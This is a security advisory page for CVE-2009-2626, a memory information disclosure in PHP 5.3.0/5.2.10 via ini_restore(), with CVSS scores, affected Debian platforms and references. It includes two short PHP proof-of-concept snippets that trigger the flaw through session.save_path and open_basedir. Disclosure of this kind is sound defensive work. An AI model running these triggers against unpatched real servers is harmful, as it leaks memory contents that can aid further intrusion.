PHP 5.3.0/5.2.10 ini_restore() related memory information disclosure

2009.12.07
Credit: Maksymilian Arciemowicz
Risk: High
Local: Yes
Remote: Yes
CVE: CVE-2009-2626
CWE: CWE-Other


CVSS Base Score: 6.4/10
Impact Subscore: 4.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: Partial

Credit/Author: Maksymilian Arciemowicz from SecurityReason Vulnerable: PHP PHP 5.3 PHP PHP 5.2.10 Debian Linux 5.0 sparc Debian Linux 5.0 s/390 Debian Linux 5.0 powerpc Debian Linux 5.0 mipsel Debian Linux 5.0 mips Debian Linux 5.0 m68k Debian Linux 5.0 ia-64 Debian Linux 5.0 ia-32 Debian Linux 5.0 hppa Debian Linux 5.0 armel Debian Linux 5.0 arm Debian Linux 5.0 amd64 Debian Linux 5.0 alpha Debian Linux 5.0 References: http://www.securityfocus.com/bid/36009/info http://securityreason.com/achievement_securityalert/65 Description: PHP is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may lead to further attacks POC 1: <?php ini_set("session.save_path", "0123456789ABCDEF"); ini_restore("session.save_path"); session_start(); ?> POC 2: <?php ini_set("open_basedir", "A"); ini_restore("open_basedir"); ini_get("open_basedir"); include("B"); ?>

References:

http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/Zend/zend_ini.c?r1=272370&r2=284156
http://www.debian.org/security/2009/dsa-1940


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top